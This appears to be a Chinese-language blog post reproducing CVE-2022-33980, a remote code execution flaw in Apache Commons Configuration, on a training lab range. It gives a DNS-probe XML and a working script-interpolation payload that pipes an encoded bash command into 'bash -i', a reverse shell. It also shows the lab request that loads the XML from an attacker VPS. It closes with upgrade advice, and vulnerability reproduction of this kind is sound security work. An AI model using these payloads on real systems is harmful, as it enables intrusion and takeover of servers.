banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

Apache Commons Configuration遠程命令執行漏洞漏洞複現

image

產品簡介#

Apache Commons Configuration 是 Apache 基金會下的一個開源專案組件。它提供了一種通用的方式,讓 Java 開發者可以使用統一的介面讀取不同類型的配置檔案。

漏洞概述#

該漏洞是由於 Apache Commons Configuration 提供的 Configuration 變數解釋功能存在缺陷,攻擊者可利用該漏洞在特定情況下,構造惡意資料執行遠程程式碼。

cve編號:CVE-2022-33980
靶場:春秋雲鏡

影響範圍#

2.4 <= Apache Commons Configuration <=2.7

利用流程#

image

  • xml 檔案
<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
        <path>${dns:lll.f8bd5ff2.dns.1433.eu.org.}</path>
</configuration>

payload:java 命令執行 payloads - 小草窩博客

image

<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
        <path>${script:js:java.lang.Runtime.getRuntime().exec("bash -c {echo,Ym........zNCA8JjE=}|{base64,-d}|{bash,-i}")}</path>
</configuration>
  • 具體請求
http://eci-2ze0j2j6z0mbs5fzqkue.cloudeci1.ichunqiu.com/Url?url=http://vps_ip:8000/config.xml&data=path

image

修復建議#

目前官方已發布修復版本修復了該漏洞,請受影響的使用者升級到 Apache Commons Configuration 2.8.0 版本。

https://commons.apache.org/proper/commons-configuration/download_configuration.cgi

參考#

GitHub - tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE: CVE-2022-33980 Apache Commons Configuration 遠程命令執行漏洞

GitHub - sammwyy/CVE-2022-33980-POC: POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

GitHub - sammwyy/CVE-2022-33980-POC: POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)

CVE-2022-41852 Apache Commons Jxpath 命令執行漏洞分析

圖片來自

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。